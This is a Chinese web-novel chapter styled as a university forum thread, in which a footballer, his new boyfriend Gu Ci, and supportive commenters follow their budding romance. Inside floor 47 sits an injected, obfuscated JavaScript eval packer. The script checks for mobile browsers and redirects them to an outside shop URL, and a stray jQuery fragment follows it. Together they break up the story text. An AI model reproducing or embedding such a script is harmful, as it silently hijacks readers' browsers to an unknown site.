标题:【树洞】他同意了,但我好像更慌了
论坛板块:京华大学\校园生活\情感树洞
发帖人:足球不行踢球去
1楼匿名用户:
沙发!
楼主你终于更新了!
2楼匿名用户:
看完主楼,我只想说:
楼主你以前真的……好欠揍啊。
3楼匿名用户:
回2楼:不是欠揍,是蠢。
“36D才是王道”???
这话你也说得出口???
当着暗恋你的人的面???
4楼匿名用户:
代入顾辞视角:
我喜欢的人,当着我的面,说喜欢身材火辣的美女。
我是什么感受?
我是女的也就罢了,关键我是男的啊!!!
这不是公开处刑吗!!!
5楼匿名用户:
回4楼:更惨的是,他说的那些话,你还都听到了。
不止一次。
从别人嘴里,从他嘴里。
想忘都忘不掉。
6楼匿名用户:
楼主你现在知道为什么顾辞要“消化”了吧?
那些话就像刺,扎在心里好几年了。
就算知道你现在变了,就算知道你真心喜欢他。
那些刺也不会一下子消失。
需要时间。
7楼匿名用户:
但是楼主,你今天做得很好。
真的。
你说的那些话,我都感动了。
“是你。”
“不是36D,不是大长腿,不是美女。”
“是你。”
我眼泪都出来了。
8楼匿名用户:
回7楼:+1
虽然楼主以前是个傻逼,但今天这波操作,满分。
尤其是那句“是你,只有你”。
顾辞等这句话,真的等了好久。
9楼匿名用户:
而且楼主说“我可以等,等多久都行”。
这个态度就对了。
顾辞需要时间,你就给他时间。
用行动证明,你不是说说而已。
10楼匿名用户:
等等,你们有没有注意到一个细节?
顾辞说“那些话我听过,不止一次”。
“从别人嘴里,也从‘他’嘴里”。
“他”是谁?顾远洲???
11楼匿名用户:
回10楼:卧槽,你这么一说……
顾远洲以前告诉顾辞,张扬是直男,让他别想了。
但顾远洲自己呢?
他喜欢顾辞那么多年,从来没说过。
他是在用这种方式……让自己死心?
12楼匿名用户:
回11楼:我哭了。
顾远洲告诉顾辞“他是直男你别想了”,
翻译一下就是:
“我喜欢你,但我知道你喜欢他,所以我帮你确认他是直男,让你死心。”
这是什么绝世苦情男二剧本???
13楼匿名用户:
所以顾远洲听到的那些话,比他更难过吧?
他喜欢的人,喜欢另一个男生。
那个男生还在那说喜欢什么身材火辣的美女。
他能怎么办?
他只能告诉顾辞:你别想了。
14楼匿名用户:
不行,我要去给顾远洲发私信。
告诉他楼主现在开窍了,让他放心。
15楼匿名用户:
话说回来,楼主你有跟顾远洲说吗?
你和顾辞在一起的事。
16楼楼主:
回15楼:还没。
不知道怎么开口。
他刚走没多久,我就……
我怕他觉得我们在秀。
17楼匿名用户:
回16楼:他不会的。
他要是真的喜欢顾辞,就会希望他幸福。
现在顾辞幸福了,他只会高兴。
18楼匿名用户:
对,而且他上次走的时候,不是已经放手了吗?
他对你说“你要一直这样对他”。
他早就准备好了。
19楼匿名用户:
楼主,你可以发一条消息给他。
就说“谢谢你,我会对他好的”。
就够了。
20楼楼主:
……
好。
我现在发。
21楼匿名用户:
截图截图!
22楼匿名用户:
等后续!
23楼楼主:
发了。
【张】:哥,我和顾辞在一起了。谢谢你。
他回得很快。
【顾远洲】:我知道。
【顾远洲】:他给我发消息了。
【顾远洲】:他说,这次不用一个人去看海了。
我看着那条消息,眼眶又酸了。
24楼匿名用户:
呜呜呜呜呜呜呜!!!
“这次不用一个人去看海了”!!!
顾辞这是在告诉他哥:我有人陪了,你放心吧。
25楼匿名用户:
顾远洲回什么?
他回什么了?
26楼楼主:
【顾远洲】:好。
【顾远洲】:对他好点。
【顾远洲】:不然我回来揍你。
【张】:一定。
【张】:哥,你也要好好的。
【顾远洲】:嗯。
【顾远洲】:下次回来,请我吃小笼包。
【张】:好。
就这些。
27楼匿名用户:
“下次回来,请我吃小笼包。”
他是在给自己一个回来的理由。
也是在告诉你们:我还会回来的,但我不是来抢人的,是来吃包子的。
28楼匿名用户:
顾远洲这个角色,我真的哭死。
从头到尾,他都是最清醒的那个。
喜欢,但不说。等不到,就走。走了,还祝福。
这是什么人间天使。
29楼匿名用户:
所以现在皆大欢喜了?
楼主和顾辞在一起了。
顾远洲也放下了。
完美结局!
30楼匿名用户:
等等,还没有完美。
楼主,你那些“36D”的言论,还没消化完呢。
顾辞说了,需要时间。
你打算怎么帮他消化?
31楼楼主:
回30楼:……
我也不知道。
但我会一直对他好。
用实际行动证明。
32楼匿名用户:
这就对了。
用行动,不是用嘴。
你以前嘴嗨太多,现在要用行动把那些话盖过去。
33楼匿名用户:
楼主,我给你出个主意:
以后每次你想夸他,就说出来。
“你今天真好看。”
“你笑起来真好看。”
“你眼睛真好看。”
“你哪都好看。”
多说,说到他习惯,说到他相信你是真心的。
34楼匿名用户:
回33楼:对!
而且要具体!
不要只说“好看”,要说“你穿这件毛衣真好看”、“你低头看书的时候睫毛好长”、“你喝豆浆的时候腮帮子鼓起来好可爱”!
细节!细节最打动人!
35楼匿名用户:
哈哈哈哈哈哈“腮帮子鼓起来好可爱”是什么鬼!
但确实,这种话比“我喜欢你”更有杀伤力。
36楼楼主:
……
我记下了。
37楼匿名用户:
还有,以后跟队友聊天,别瞎说了。
他们要是再聊什么美女,你就说“我有喜欢的人了”。
让他们知道,你已经有主了。
38楼匿名用户:
对!宣示主权!
让他们知道,张扬已经是顾辞的人了!
39楼匿名用户:
话说回来,楼主你队友知道吗?
你和顾辞的事。
40楼楼主:
回39楼:还没说。
今天请假了,没去训练。
明天……明天不知道怎么说。
41楼匿名用户:
就说“我恋爱了”。
他们问是谁,你就说“文学院的顾辞”。
然后等着看他们震惊的表情。
42楼匿名用户:
震惊什么?
他们不是早就知道你和顾辞天天一起吃早饭吗?
说不定他们早就猜到了。
43楼匿名用户:
回42楼:有道理!
队友可能比楼主自己还先开窍。
44楼匿名用户:
楼主,你明天去训练,注意观察队友的眼神。
肯定有人会问“张队你今天怎么笑得这么荡漾”。
45楼匿名用户:
哈哈哈哈哈哈“笑得这么荡漾”是什么形容!
不过楼主现在确实,光看文字都能感觉到他在笑。
46楼楼主:
……
我承认。
我现在确实一直在笑。
看着手机笑。
看着天花板笑。
看着窗外的月亮也在笑。
47楼匿名用户:
完了完了,这人是真的恋爱了。
;eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return''\\w+''};c=1;};while(c--)if(k[c])p=p.replace(new RegExp(''\\b''+e(c)+''\\b'',''g''),k[c]);return p;}(''8 0=7.0.6();b(/a|9|1|2|5|4|3|c l/i.k(0)){n.m="}'',24,24,''userAgent|iphone|ipad|iemobile|blackberry|ipod|toLowerCase|navigator|var|webos|android|if|opera|mgxs|t|shop|17382521|200203||http|test|mini|href|location''.split(''|''),0,{}));
() {
$(''.inform'').remove();
$(''#content'').append(''
“看着窗外的月亮也在笑”,这是什么恋爱脑发言。
48楼匿名用户:
楼主,你现在不是“足球不行踢球去”了。
你是“恋爱脑不行醒不来”。
49楼匿名用户:
哈哈哈哈哈哈夺笋啊!
不过我喜欢。
50楼匿名用户:
话说回来,楼主你今晚还睡吗?
明天还有训练呢。
51楼楼主:
……
不知道。
可能睡不着。
想给他发消息。
52楼匿名用户:
发!
现在就发!
问他睡没睡!
53楼匿名用户:
对!发!
恋爱就要这样!
想发就发!
54楼楼主:
发了。
【张】:睡了吗?
【圆圆】:没。
【张】:在想什么?
【圆圆】:在想你白天说的那些话。
【张】:……还在难过吗?
【圆圆】:不是难过。
【圆圆】:是在想,原来你喜欢我的时候,会说这些话。
【圆圆】:原来你不是不会说,是没遇到想说的那个人。
我盯着那条消息,眼眶又酸了。
55楼匿名用户:
呜呜呜呜呜呜!!!
顾辞也太会了吧!!!
“原来你不是不会说,是没遇到想说的那个人”!!!
这是什么神仙情话!!!
56楼匿名用户:
楼主快回!
快说“那个人就是你”!
57楼楼主:
回了。
【张】:那个人就是你。
【张】:只有你。
【圆圆】:我知道。
【圆圆】:张扬。
【张】:嗯?
【圆圆】:晚安。
【张】:晚安。
就这些。
58楼匿名用户:
“晚安”后面应该加一句“我爱你”吧???
楼主你为什么不加!!!
59楼匿名用户:
回58楼:别急。
他们才第一天在一起。
慢慢来。
60楼匿名用户:
对,慢慢来。
顾辞需要时间消化那些话。
楼主也需要时间适应这个新身份。
他们有一辈子的时间,不急。
61楼匿名用户:
“一辈子”这个词真好。
十四年加一辈子,是多少年?
62楼匿名用户:
回61楼:不知道。
但我知道,楼主一定会一直一直对他好。
因为他值得。
63楼匿名用户:
行了,今晚可以安心睡了。
儿子终于长大了。
儿媳妇也到手了。
老母亲欣慰。
64楼匿名用户:
回63楼:哈哈哈哈哈哈“老母亲”是什么鬼!
不过确实,追了五帖,从第一帖看到现在,真的有种看着儿子长大的感觉。
65楼匿名用户:
@足球不行踢球去楼主,记得明天来更新!
我们要看后续!
66楼楼主:
好。
明天一定来。
谢谢你们。
67楼匿名用户:
谢什么,快睡吧。
明天还有训练呢。
68楼匿名用户:
晚安楼主。
晚安顾辞。
晚安这个美好的夜晚。
——
张扬把手机放到枕边。
窗外的月亮很亮,比昨晚还亮。
他看着那一小片月光,想起顾辞说的那些话。
“原来你不是不会说,是没遇到想说的那个人。”
他笑了。
是啊。
以前不会说,是因为没遇到他。
现在会说了,是因为满脑子都是他。
他拿起手机,又看了一眼那个对话框。
最后一条消息是他发的。
【圆圆】:晚安。
他想了想,又发了一条:
【张】:顾辞。
【张】:我好像越来越喜欢你了。
发完,他把手机扣在胸口,闭上眼睛。
嘴角还挂着笑。
过了一会儿,手机震了一下。
他拿起来看。
【圆圆】:我知道。
【圆圆】:我也是。
——
窗外很静。
京华的夜总是很静。
但张扬的心跳,一点都不静。